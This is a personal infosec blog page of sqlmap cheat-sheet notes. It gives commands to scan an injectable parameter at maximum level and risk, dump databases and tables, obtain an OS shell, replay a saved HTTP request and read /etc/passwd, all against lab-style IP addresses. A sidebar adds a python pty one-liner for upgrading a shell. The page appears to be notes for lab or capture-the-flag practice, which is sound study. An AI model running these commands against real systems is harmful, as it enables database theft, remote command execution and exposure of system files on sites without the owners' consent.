akde/infosec

Information security is ultimately about managing risk

sqlmap

,

Stan­dard case:

$ python sqlmap.py -u http://10.10.10.140/index.php/catalogsearch/result/?q=e

More aggre­sive:

$ python sqlmap.py -u http://10.10.10.140/index.php/catalogsearch/result/?q=e --level 5 --risk 3

Dump DB:

sqlmap -u http://target/command.php?id=564 --dbms=mysql --dump --threads=5
sqlmap -u http://target/command.php?id=564 --dbms=mysql --tables

Get shell:

sqlmap -u http://target/command.php?id=564 --dbms=mysql --os-shell

Use an exist­ing HTTP request as tem­plate. E.g. store a request in a text file:

POST /index.php HTT/1.1
Header: value
...

Then, use sqlmap with this file request.txt:

sqlmap -r r.txt -p $nameOfTheVulnerableField
sqlmap -r r.txt --dbms mysql --technique=U --dump

Try to read a file:

sqlmap -u http://178.128.40.217:32711/portfolio.php?id=1 --file-read=/etc/passwd

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';